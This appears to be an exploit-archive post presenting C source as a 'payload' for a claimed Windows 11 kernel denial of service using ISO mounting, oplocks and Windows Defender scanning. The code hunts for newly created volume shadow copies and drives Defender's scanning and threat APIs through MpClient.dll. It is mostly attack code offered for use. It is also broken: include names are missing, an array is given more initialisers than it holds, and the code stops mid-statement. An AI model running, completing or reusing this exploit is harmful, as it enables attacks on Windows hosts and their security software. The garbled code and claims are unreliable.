================================================================================================================================== | # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) | | # Vendor : Windows 11 25H2 (Build 26200) and later | ================================================================================================================================== [+] Summary : A Logical Denial of Service (LDoS) vulnerability in Windows 11 25H2 (Build 26200) that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning. [+] Payload : #define _CRT_SECURE_NO_WARNINGS #define _WIN32_DCOM #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #pragma comment(lib, "kernel32.lib") #pragma comment(lib, "bcrypt.lib") #pragma comment(lib, "taskschd.lib") #pragma comment(lib, "comsupp.lib") #pragma comment(lib, "virtdisk.lib") #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "Rpcrt4.lib") #pragma comment(lib, "shlwapi.lib") wchar_t zippath[MAX_PATH] = { 0 }; HMODULE ntdllhm = NULL; HANDLE g_poseidonevent = NULL; bool g_poseidonexit = false; char g_poseidonbuf[0x1000] = { 0 }; unsigned char rawData[2] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; NTSTATUS(WINAPI* _NtSetInformationFile)( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass ) = NULL; NTSTATUS(WINAPI* _NtDeleteFile)( _In_ POBJECT_ATTRIBUTES ObjectAttributes ) = NULL; NTSTATUS(WINAPI* _NtOpenDirectoryObject)( PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes ) = NULL; NTSTATUS(WINAPI* _NtQueryDirectoryObject)( HANDLE DirectoryHandle, PVOID Buffer, ULONG Length, BOOLEAN ReturnSingleEntry, BOOLEAN RestartScan, PULONG Context, PULONG ReturnLength ) = NULL; NTSTATUS(WINAPI* _NtQueryInformationFile)( HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass ) = NULL; #define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset)))) namespace custom_defs { typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemMirrorMemoryInformation, SystemPerformanceTraceInformation, SystemObsolete0, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeparation, SystemVerifierAddDriverInformation, SystemVerifierRemoveDriverInformation, SystemProcessorIdleInformation, SystemLegacyDriverInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation, SystemTimeSlipNotification, SystemSessionCreate, SystemSessionDetach, SystemSessionInformation, SystemRangeStartInformation, SystemVerifierInformation, SystemVerifierThunkExtend, SystemSessionProcessInformation, SystemLoadGdiDriverInSystemSpace, SystemNumaProcessorMap, SystemPrefetcherInformation, SystemExtendedProcessInformation, SystemRecommendedSharedDataAlignment, SystemComPlusPackage, SystemNumaAvailableMemory, SystemProcessorPowerInformation, SystemEmulationBasicInformation, SystemEmulationProcessorInformation, SystemExtendedHandleInformation, SystemLostDelayedWriteInformation, SystemBigPoolInformation, SystemSessionPoolTagInformation, SystemSessionMappedViewInformation, SystemHotpatchInformation, SystemObjectSecurityMode, SystemWatchdogTimerHandler, SystemWatchdogTimerInformation, SystemLogicalProcessorInformation, SystemWow64SharedInformationObsolete, SystemRegisterFirmwareTableInformationHandler, SystemFirmwareTableInformation, SystemModuleInformationEx, SystemVerifierTriageInformation, SystemSuperfetchInformation, SystemMemoryListInformation, SystemFileCacheInformationEx, SystemThreadPriorityClientIdInformation, SystemProcessorIdleCycleTimeInformation, SystemVerifierCancellationInformation, SystemProcessorPowerInformationEx, SystemRefTraceInformation, SystemSpecialPoolInformation, SystemProcessIdInformation, SystemErrorPortInformation, SystemBootEnvironmentInformation, SystemHypervisorInformation, SystemVerifierInformationEx, SystemTimeZoneInformation, SystemImageFileExecutionOptionsInformation, SystemCoverageInformation, SystemPrefetchPatchInformation, SystemVerifierFaultsInformation, SystemSystemPartitionInformation, SystemSystemDiskInformation, SystemProcessorPerformanceDistribution, SystemNumaProximityNodeInformation, SystemDynamicTimeZoneInformation, SystemCodeIntegrityInformation, SystemProcessorMicrocodeUpdateInformation, SystemProcessorBrandString, SystemVirtualAddressInformation, SystemLogicalProcessorAndGroupInformation, SystemProcessorCycleTimeInformation, SystemStoreInformation, SystemRegistryAppendString, SystemAitSamplingValue, SystemVhdBootInformation, SystemCpuQuotaInformation, SystemNativeBasicInformation, SystemErrorPortTimeouts, SystemLowPriorityIoInformation, SystemTpmBootEntropyInformation, SystemVerifierCountersInformation, SystemPagedPoolInformationEx, SystemSystemPtesInformationEx, SystemNodeDistanceInformation, SystemAcpiAuditInformation, SystemBasicPerformanceInformation, SystemQueryPerformanceCounterInformation, SystemSessionBigPoolInformation, SystemBootGraphicsInformation, SystemScrubPhysicalMemoryInformation, SystemBadPageInformation, SystemProcessorProfileControlArea, SystemCombinePhysicalMemoryInformation, SystemEntropyInterruptTimingInformation, SystemConsoleInformation, SystemPlatformBinaryInformation, SystemPolicyInformation, SystemHypervisorProcessorCountInformation, SystemDeviceDataInformation, SystemDeviceDataEnumerationInformation, SystemMemoryTopologyInformation, SystemMemoryChannelInformation, SystemBootLogoInformation, SystemProcessorPerformanceInformationEx, SystemCriticalProcessErrorLogInformation, SystemSecureBootPolicyInformation, SystemPageFileInformationEx, SystemSecureBootInformation, SystemEntropyInterruptTimingRawInformation, SystemPortableWorkspaceEfiLauncherInformation, SystemFullProcessInformation, SystemKernelDebuggerInformationEx, SystemBootMetadataInformation, SystemSoftRebootInformation, SystemElamCertificateInformation, SystemOfflineDumpConfigInformation, SystemProcessorFeaturesInformation, SystemRegistryReconciliationInformation, SystemEdidInformation, SystemManufacturingInformation, SystemEnergyEstimationConfigInformation, SystemHypervisorDetailInformation, SystemProcessorCycleStatsInformation, SystemVmGenerationCountInformation, SystemTrustedPlatformModuleInformation, SystemKernelDebuggerFlags, SystemCodeIntegrityPolicyInformation, SystemIsolatedUserModeInformation, SystemHardwareSecurityTestInterfaceResultsInformation, SystemSingleModuleInformation, SystemAllowedCpuSetsInformation, SystemVsmProtectionInformation, SystemInterruptCpuSetsInformation, SystemSecureBootPolicyFullInformation, SystemCodeIntegrityPolicyFullInformation, SystemAffinitizedInterruptProcessorInformation, SystemRootSiloInformation, SystemCpuSetInformation, SystemCpuSetTagInformation, SystemWin32WerStartCallout, SystemSecureKernelProfileInformation, SystemCodeIntegrityPlatformManifestInformation, SystemInterruptSteeringInformation, SystemSupportedProcessorArchitectures, SystemMemoryUsageInformation, SystemCodeIntegrityCertificateInformation, SystemPhysicalMemoryInformation, SystemControlFlowTransition, SystemKernelDebuggingAllowed, SystemActivityModerationExeState, SystemActivityModerationUserSettings, SystemCodeIntegrityPoliciesFullInformation, SystemCodeIntegrityUnlockInformation, SystemIntegrityQuotaInformation, SystemFlushInformation, SystemProcessorIdleMaskInformation, SystemSecureDumpEncryptionInformation, SystemWriteConstraintInformation, SystemKernelVaShadowInformation, SystemHypervisorSharedPageInformation, SystemFirmwareBootPerformanceInformation, SystemCodeIntegrityVerificationInformation, SystemFirmwarePartitionInformation, SystemSpeculationControlInformation, SystemDmaGuardPolicyInformation, SystemEnclaveLaunchControlInformation, SystemWorkloadAllowedCpuSetsInformation, SystemCodeIntegrityUnlockModeInformation, SystemLeapSecondInformation, SystemFlags2Information, SystemSecurityModelInformation, SystemCodeIntegritySyntheticCacheInformation, SystemFeatureConfigurationInformation, SystemFeatureConfigurationSectionInformation, SystemFeatureUsageSubscriptionInformation, SystemSecureSpeculationControlInformation, SystemSpacesBootInformation, SystemFwRamdiskInformation, SystemWheaIpmiHardwareInformation, SystemDifSetRuleClassInformation, SystemDifClearRuleClassInformation, SystemDifApplyPluginVerificationOnDriver, SystemDifRemovePluginVerificationOnDriver, SystemShadowStackInformation, SystemBuildVersionInformation, SystemPoolLimitInformation, SystemCodeIntegrityAddDynamicStore, SystemCodeIntegrityClearDynamicStores, SystemDifPoolTrackingInformation, SystemPoolZeroingInformation, SystemDpcWatchdogInformation, SystemDpcWatchdogInformation2, SystemSupportedProcessorArchitectures2, SystemSingleProcessorRelationshipInformation, SystemXfgCheckFailureInformation, SystemIommuStateInformation, SystemHypervisorMinrootInformation, SystemHypervisorBootPagesInformation, SystemPointerAuthInformation, SystemSecureKernelDebuggerInformation, SystemOriginalImageFeatureInformation, SystemMemoryNumaInformation, SystemMemoryNumaPerformanceInformation, SystemCodeIntegritySignedPoliciesFullInformation, SystemSecureCoreInformation, SystemTrustedAppsRuntimeInformation, SystemBadPageInformationEx, SystemResourceDeadlockTimeout, SystemBreakOnContextUnwindFailureInformation, SystemOslRamdiskInformation, SystemCodeIntegrityPolicyManagementInformation, SystemMemoryNumaCacheInformation, SystemProcessorFeaturesBitMapInformation, SystemRefTraceInformationEx, SystemBasicProcessInformation, SystemHandleCountInformation, SystemRuntimeAttestationReport, SystemPoolTagInformation2, SystemCodeIntegrityEndpointSecurityInformation, MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; HANDLE UniqueProcessId; HANDLE HandleValue; ACCESS_MASK GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; _Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; typedef enum _FILE_INFORMATION_CLASS { FileDirectoryInformation = 1, FileFullDirectoryInformation, FileBothDirectoryInformation, FileBasicInformation, FileStandardInformation, FileInternalInformation, FileEaInformation, FileAccessInformation, FileNameInformation, FileRenameInformation, FileLinkInformation, FileNamesInformation, FileDispositionInformation, FilePositionInformation, FileFullEaInformation, FileModeInformation, FileAlignmentInformation, FileAllInformation, FileAllocationInformation, FileEndOfFileInformation, FileAlternateNameInformation, FileStreamInformation, FilePipeInformation, FilePipeLocalInformation, FilePipeRemoteInformation, FileMailslotQueryInformation, FileMailslotSetInformation, FileCompressionInformation, FileObjectIdInformation, FileCompletionInformation, FileMoveClusterInformation, FileQuotaInformation, FileReparsePointInformation, FileNetworkOpenInformation, FileAttributeTagInformation, FileTrackingInformation, FileIdBothDirectoryInformation, FileIdFullDirectoryInformation, FileValidDataLengthInformation, FileShortNameInformation, FileIoCompletionNotificationInformation, FileIoStatusBlockRangeInformation, FileIoPriorityHintInformation, FileSfioReserveInformation, FileSfioVolumeInformation, FileHardLinkInformation, FileProcessIdsUsingFileInformation, FileNormalizedNameInformation, FileNetworkPhysicalNameInformation, FileIdGlobalTxDirectoryInformation, FileIsRemoteDeviceInformation, FileUnusedInformation, FileNumaNodeInformation, FileStandardLinkInformation, FileRemoteProtocolInformation, FileRenameInformationBypassAccessCheck, FileLinkInformationBypassAccessCheck, FileVolumeNameInformation, FileIdInformation, FileIdExtdDirectoryInformation, FileReplaceCompletionInformation, FileHardLinkFullIdInformation, FileIdExtdBothDirectoryInformation, FileDispositionInformationEx, FileRenameInformationEx, FileRenameInformationExBypassAccessCheck, FileDesiredStorageClassInformation, FileStatInformation, FileMemoryPartitionInformation, FileStatLxInformation, FileCaseSensitiveInformation, FileLinkInformationEx, FileLinkInformationExBypassAccessCheck, FileStorageReserveIdInformation, FileCaseSensitiveInformationForceAccessCheck, FileKnownFolderInformation, FileStatBasicInformation, FileId64ExtdDirectoryInformation, FileId64ExtdBothDirectoryInformation, FileIdAllExtdDirectoryInformation, FileIdAllExtdBothDirectoryInformation, FileStreamReservationInformation, FileMupProviderInfo, FileMaximumInformation } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS; } typedef HANDLE MPHANDLE; typedef HANDLE* PMPHANDLE; typedef ULONG MPTHREAT_ID; typedef ULONG MPRESOURCE_CLASS; typedef LPWSTR MP_MIDL_STRING; typedef enum tagMPTHREAT_TYPE { MPTHREAT_TYPE_KNOWNBAD = 0, MPTHREAT_TYPE_BEHAVIOR = 1, MPTHREAT_TYPE_UNKNOWN = 2, MPTHREAT_TYPE_KNOWNGOOD = 3, MPTHREAT_TYPE_NIS = 4, MPTHREAT_TYPE_MAXVALUE = 4 } MPTHREAT_TYPE; typedef enum tagMPTHREAT_SOURCE { MPTHREAT_SOURCE_SCAN = 0, MPTHREAT_SOURCE_ACTIVE = 1, MPTHREAT_SOURCE_HISTORY = 2, MPTHREAT_SOURCE_QUARANTINE = 3, MPTHREAT_SOURCE_SIGNATURE = 4, MPTHREAT_SOURCE_STATE = 5, MPTHREAT_SOURCE_MAXVALUE = 5 } MPTHREAT_SOURCE; typedef enum tagMPSCAN_TYPE { MPSCAN_TYPE_UNKNOWN = 0, MPSCAN_TYPE_QUICK = 1, MPSCAN_TYPE_FULL = 2, MPSCAN_TYPE_RESOURCE = 3, MPSCAN_TYPE_MAXVALUE = 3 } MPSCAN_TYPE; typedef enum tagMPTHREAT_ACTION { MP_THREAT_ACTION_UNKNOWN = 0, MP_THREAT_ACTION_CLEAN = 1, MP_THREAT_ACTION_QUARANTINE = 2, MP_THREAT_ACTION_REMOVE = 3, MP_THREAT_ACTION_ALLOW = 6, MP_THREAT_ACTION_USERDEFINED = 8, MP_THREAT_ACTION_NOACTION = 9, MP_THREAT_ACTION_BLOCK = 10, MP_THREAT_ACTION_MAX_VALUE = 10 } MPTHREAT_ACTION; typedef struct tagMPTHREAT_INFO { MPTHREAT_ID ThreatID; GUID DetectionID; MP_MIDL_STRING Name; MPTHREAT_TYPE ThreatType; MPTHREAT_SEVERITY ThreatCriticality; MPTHREAT_CATEGORY ThreatCategory; DWORD ThreatShortDescriptionID; DWORD ThreatAdviseDescriptionID; MPTHREAT_STATUS ThreatStatus; DWORD SuggestedActionCount; MPTHREAT_ACTION SuggestedActionArray[10000]; DWORD ResourceCount; PVOID ResourceList[1024]; ULARGE_INTEGER ThreatStatusTime; HRESULT ThreatStatusCode; DWORD ThreatDetection; GUID QuarantineGuid; DWORD ExecutionStatus; PVOID Data; DWORD State; MP_MIDL_STRING DetectionUser; DWORD DetectionSource; MP_MIDL_STRING ProcessName; DWORD DetectionOrigin; DWORD reserved1; ULARGE_INTEGER DetectionTime; DWORD PreExecutionStatus; ULARGE_INTEGER RemediationTime; DWORD PostExecutionStatus; BOOL CriticalFailure; DWORD NonCriticalReason; MP_MIDL_STRING RemediationUser; DWORD RemediationResourceCount; PVOID RemediationResourceList[1024]; BOOL FailureResolved; DWORD ResolvedReason; DWORD AdditionalActions; DWORD ResolvedActions; DWORD dwThreatStatusFlag; } MPTHREAT_INFO, * PMPTHREAT_INFO; typedef struct tagMPRESOURCE_INFO { MP_MIDL_STRING Scheme; MP_MIDL_STRING Path; MPRESOURCE_CLASS Class; } MPRESOURCE_INFO, * PMPRESOURCE_INFO; typedef struct tagMPSCAN_RESOURCES { DWORD dwResourceCount; PMPRESOURCE_INFO pResourceList; } MPSCAN_RESOURCES, * PMPSCAN_RESOURCES; typedef struct tagMPCALLBACK_INFO { void* CallbackHandler; __int64 v4; } MPCALLBACK_INFO, * PMPCALLBACK_INFO; typedef struct _FILE_BASIC_INFORMATION { LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; ULONG FileAttributes; } FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION; typedef struct _FILE_RENAME_INFORMATION { union { BOOLEAN ReplaceIfExists; ULONG Flags; } DUMMYUNIONNAME; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION; typedef struct _REPARSE_DATA_BUFFER { ULONG ReparseTag; USHORT ReparseDataLength; USHORT Reserved; union { struct { USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; ULONG Flags; WCHAR PathBuffer[1]; } SymbolicLinkReparseBuffer; struct { USHORT SubstituteNameOffset; USHORT SubstituteNameLength; USHORT PrintNameOffset; USHORT PrintNameLength; WCHAR PathBuffer[1]; } MountPointReparseBuffer; struct { UCHAR DataBuffer[1]; } GenericReparseBuffer; } DUMMYUNIONNAME; } REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER; #define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer) #define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8 typedef struct _FILE_DISPOSITION_INFORMATION_EX { ULONG Flags; } FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX; typedef struct _OBJECT_DIRECTORY_INFORMATION { UNICODE_STRING Name; UNICODE_STRING TypeName; } OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION; struct LLShadowVolumeNames { wchar_t* name; LLShadowVolumeNames* next; }; void DestroyVSSNamesList(LLShadowVolumeNames* First) { while (First) { free(First->name); LLShadowVolumeNames* next = First->next; free(First); First = next; } } LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) { if (!criticalerr || !vscnumber || !errorcode) return NULL; *vscnumber = 0; ULONG scanctx = 0; ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2); ULONG retsz = 0; OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); if (!objdirinfo) { printf("[!] Failed to allocate buffer for object manager directory query.\n"); *criticalerr = true; *errorcode = ERROR_NOT_ENOUGH_MEMORY; return NULL; } ZeroMemory(objdirinfo, reqsz); NTSTATUS stat = STATUS_SUCCESS; do { stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz); if (stat == STATUS_SUCCESS) break; else if (stat != STATUS_MORE_ENTRIES) { printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat); *criticalerr = true; *errorcode = RtlNtStatusToDosError(stat); return NULL; } free(objdirinfo); reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100; objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); if (!objdirinfo) { printf("[!] Failed to allocate required buffer to query object manager directory.\n"); *criticalerr = true; *errorcode = ERROR_NOT_ENOUGH_MEMORY; return NULL; } ZeroMemory(objdirinfo, reqsz); } while (1); void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION)); ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)); LLShadowVolumeNames* LLVSScurrent = NULL; LLShadowVolumeNames* LLVSSfirst = NULL; for (ULONG i = 0; i < ULONG_MAX; i++) { if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) { free(emptybuff); break; } if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) { wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" }; if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) { if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) { (*vscnumber)++; if (LLVSScurrent) { LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames)); if (!LLVSScurrent->next) { printf("[!] Failed to allocate memory.\n"); *criticalerr = true; *errorcode = ERROR_NOT_ENOUGH_MEMORY; DestroyVSSNamesList(LLVSSfirst); free(objdirinfo); return NULL; } ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames)); LLVSScurrent = LLVSScurrent->next; LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t)); if (!LLVSScurrent->name) { printf("[!] Failed to allocate memory.\n"); *errorcode = ERROR_NOT_ENOUGH_MEMORY; *criticalerr = true; DestroyVSSNamesList(LLVSSfirst); free(objdirinfo); return NULL; } ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t)); memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length); } else { LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames)); if (!LLVSSfirst) { printf("[!] Failed to allocate memory.\n"); *errorcode = ERROR_NOT_ENOUGH_MEMORY; *criticalerr = true; DestroyVSSNamesList(LLVSSfirst); free(objdirinfo); return NULL; } ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames)); LLVSScurrent = LLVSSfirst; LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t)); if (!LLVSScurrent->name) { printf("[!] Failed to allocate memory.\n"); *errorcode = ERROR_NOT_ENOUGH_MEMORY; *criticalerr = true; DestroyVSSNamesList(LLVSSfirst); free(objdirinfo); return NULL; } ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t)); memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length); } } } } } free(objdirinfo); return LLVSSfirst; } DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) { wchar_t devicepath[] = L"\\Device"; UNICODE_STRING udevpath = { 0 }; RtlInitUnicodeString(&udevpath, devicepath); OBJECT_ATTRIBUTES objattr = { 0 }; InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL); NTSTATUS stat = STATUS_SUCCESS; HANDLE hobjdir = NULL; DWORD retval = ERROR_SUCCESS; wchar_t newvsspath[MAX_PATH] = { 0 }; wcscpy(newvsspath, L"\\Device\\"); bool criterr = false; int vscnum = 0; bool restartscan = false; ULONG scanctx = 0; ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2); ULONG retsz = 0; OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL; bool srchfound = false; wchar_t vsswinpath[MAX_PATH] = { 0 }; UNICODE_STRING _vsswinpath = { 0 }; OBJECT_ATTRIBUTES objattr2 = { 0 }; IO_STATUS_BLOCK iostat = { 0 }; HANDLE hlk = NULL; LLShadowVolumeNames* vsinitial = NULL; stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr); if (stat) { printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat); retval = RtlNtStatusToDosError(stat); return retval; } void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION)); if (!emptybuff) { printf("[!] Failed to allocate memory.\n"); retval = ERROR_NOT_ENOUGH_MEMORY; goto cleanup; } ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)); vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval); if (criterr) { printf("[!] Unexpected error while listing current volume shadow copy volumes.\n"); goto cleanup; } if (!vsinitial) { printf("[*] No volume shadow copies were found.\n"); } else { printf("[*] Found %d volume shadow copies.\n", vscnum); } stat = STATUS_SUCCESS; scanagain: do { if (objdirinfo) free(objdirinfo); objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz); if (!objdirinfo) { printf("[!] Failed to allocate required buffer to query object manager directory.\n"); retval = ERROR_NOT_ENOUGH_MEMORY; goto cleanup; } ZeroMemory(objdirinfo, reqsz); scanctx = 0; stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz); if (stat == STATUS_SUCCESS) break; else if (stat != STATUS_MORE_ENTRIES) { printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat); retval = RtlNtStatusToDosError(stat); goto cleanup; } reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100; } while (1); for (ULONG i = 0; i < ULONG_MAX; i++) { if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) { break; } if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) { wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" }; if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) { if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) { LLShadowVolumeNames* current = vsinitial; bool found = false; while (current) { if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) { found = true; break; } current = current->next; } if (found) continue; else { srchfound = true; wcscat(newvsspath, objdirinfo[i].Name.Buffer); break; } } } } } if (!srchfound) { restartscan = true; goto scanagain; } if (objdirinfo) { free(objdirinfo); objdirinfo = NULL; } NtClose(hobjdir); hobjdir = NULL; printf("[+] New volume shadow copy detected: %ws\n", newvsspath); wcscpy(vsswinpath, newvsspath); wcscat(vsswinpath, L"\\Windows"); RtlInitUnicodeString(&_vsswinpath, vsswinpath); InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL); retry: stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL); if (stat == STATUS_NO_SUCH_DEVICE) goto retry; if (stat) { printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat); retval = RtlNtStatusToDosError(stat); goto cleanup; } printf("[+] Successfully accessed volume shadow copy.\n"); CloseHandle(hlk); if (fullvsspath) wcscpy((wchar_t*)fullvsspath, newvsspath); cleanup: if (hobjdir) NtClose(hobjdir); if (emptybuff) free(emptybuff); if (vsinitial) DestroyVSSNamesList(vsinitial); return retval; } DWORD MpCleanCallbackFunction() { printf("[*] MpCleanCallbackFunction called.\n"); return 0; } bool GetWDInstallDir(wchar_t* dirname) { HKEY hkey = NULL; LSTATUS lstat = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_QUERY_VALUE, &hkey); if (lstat) { printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat); return false; } DWORD keytype = REG_SZ; DWORD datasz = MAX_PATH * sizeof(wchar_t); lstat = RegQueryValueEx(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz); if (lstat) { printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat); return false; } RegCloseKey(hkey); return true; } bool GetWERDir(wchar_t* dirname) { wchar_t windir[MAX_PATH] = { 0 }; GetWindowsDirectory(windir, MAX_PATH); wcscpy(dirname, windir); wcscat(dirname, L"\\System32"); return true; } DWORD WINAPI WDStartScan(void*) { wchar_t dllpath[MAX_PATH] = { 0 }; if (!GetWDInstallDir(dllpath)) { ExitProcess(1); } wcscat(dllpath, L"MpClient.dll"); HMODULE hm = LoadLibrary(dllpath); if (!hm) { printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError()); ExitProcess(1); } HRESULT(WINAPI* _MpUpdateStart)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, DWORD, PMPCALLBACK_INFO, PMPHANDLE)) GetProcAddress(hm, "MpUpdateStart"); HRESULT(WINAPI* _MpManagerOpen)(DWORD, PMPHANDLE) = (HRESULT(WINAPI*)(DWORD, PMPHANDLE)) GetProcAddress(hm, "MpManagerOpen"); HRESULT(WINAPI* _MpScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE)) GetProcAddress(hm, "MpScanStart"); HRESULT(WINAPI* _MpScanResult)(MPHANDLE, void*) = (HRESULT(WINAPI*)(MPHANDLE, void*)) GetProcAddress(hm, "MpScanResult"); HRESULT(WINAPI* _MpThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE) = (HRESULT(WINAPI*)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE)) GetProcAddress(hm, "MpThreatOpen"); HRESULT(WINAPI* _MpThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*) = (HRESULT(WINAPI*)(MPHANDLE, PMPTHREAT_INFO*)) GetProcAddress(hm, "MpThreatEnumerate"); HRESULT(WINAPI* _MpCleanOpen)(void*, void*, void***) = 